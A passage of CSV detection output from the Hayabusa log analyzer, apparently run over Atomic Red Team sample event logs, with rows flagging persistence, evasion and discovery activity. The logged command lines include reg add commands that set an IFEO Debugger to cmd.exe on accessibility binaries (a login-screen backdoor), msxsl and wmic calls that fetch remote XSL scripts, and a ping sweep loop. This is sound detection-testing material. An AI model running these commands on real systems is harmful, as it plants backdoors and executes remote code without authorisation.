HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:10.295 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2272 | PGUID: 747F3D96-D8A2-5D31-0000-0010D5913200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:10.295 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:10.295 +00:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_sysmon/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:10.324 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2484 | PGUID: 747F3D96-D8A2-5D31-0000-0010D8943200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:13.109 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4212 | PGUID: 747F3D96-D8A5-5D31-0000-0010729B3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:13.127 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:13.153 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5000 | PGUID: 747F3D96-D8A5-5D31-0000-0010C39D3200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:13.153 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:13.153 +00:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_sysmon/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:13.185 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6116 | PGUID: 747F3D96-D8A5-5D31-0000-0010C0A03200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:14.678 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D8A6-5D31-0000-001053A73200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:14.692 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:14.716 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:14.716 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:14.716 +00:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_sysmon/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:14.827 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6664 | PGUID: 747F3D96-D8A6-5D31-0000-0010F9B13200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:17.941 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D8A9-5D31-0000-001072C43200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:17.963 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:17.990 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:17.990 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:17.990 +00:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_sysmon/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:18.009 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6016 | PGUID: 747F3D96-D8AA-5D31-0000-0010C0C93200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:19.467 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6244 | PGUID: 747F3D96-D8AB-5D31-0000-001054D03200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:19.491 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:19.516 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:19.516 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:19.549 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1888 | PGUID: 747F3D96-D8AB-5D31-0000-0010A4D53200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:25.376 +00:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49727 (MSEDGEWIN10.home) | Dst: 172.217.17.132:80 (ams15s30-in-f4.1e100.net) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:25.376 +00:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/net_connection_win_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:50.046 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D8CA-5D31-0000-0010DA413300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:50.086 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6268 | PGUID: 747F3D96-D8CA-5D31-0000-0010CF443300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:53.011 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D8CC-5D31-0000-001038513300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:53.062 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1852 | PGUID: 747F3D96-D8CD-5D31-0000-001047543300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:55.991 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D8CF-5D31-0000-00109B603300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:56.047 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:list | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D8D0-5D31-0000-0010F3623300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:56.047 +00:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation_sysmon/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:50:56.182 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D8D0-5D31-0000-001034673300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:06.728 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5340 | PGUID: 747F3D96-D8DA-5D31-0000-0010D3833300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:06.753 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D8DA-5D31-0000-001029863300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:06.753 +00:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation_sysmon/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:06.753 +00:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation_sysmon/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:06.753 +00:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation_sysmon/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:06.888 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D8DA-5D31-0000-00100D8A3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:09.823 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4856 | PGUID: 747F3D96-D8DD-5D31-0000-0010EF923300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:09.845 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view /domain | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | LID: 0x50951 | PID: 3012 | PGUID: 747F3D96-D8DD-5D31-0000-001043953300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:09.845 +00:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,rules/sigma/process_creation_sysmon/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:09.845 +00:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:22.314 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D8EA-5D31-0000-001030B63300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:22.333 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | LID: 0x50951 | PID: 4684 | PGUID: 747F3D96-D8EA-5D31-0000-00108AB83300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:22.333 +00:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,rules/sigma/process_creation_sysmon/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:22.333 +00:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:34.797 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-D8F6-5D31-0000-00100FCB3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:35.014 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4528 | PGUID: 747F3D96-D8F6-5D31-0000-001091D13300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:35.014 +00:00,MSEDGEWIN10,1,medium,Exec | Disc,Suspicious Scan Loop Network,,rules/sigma/process_creation_sysmon/proc_creation_win_network_scan_loop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:35.038 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.1 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3876 | PGUID: 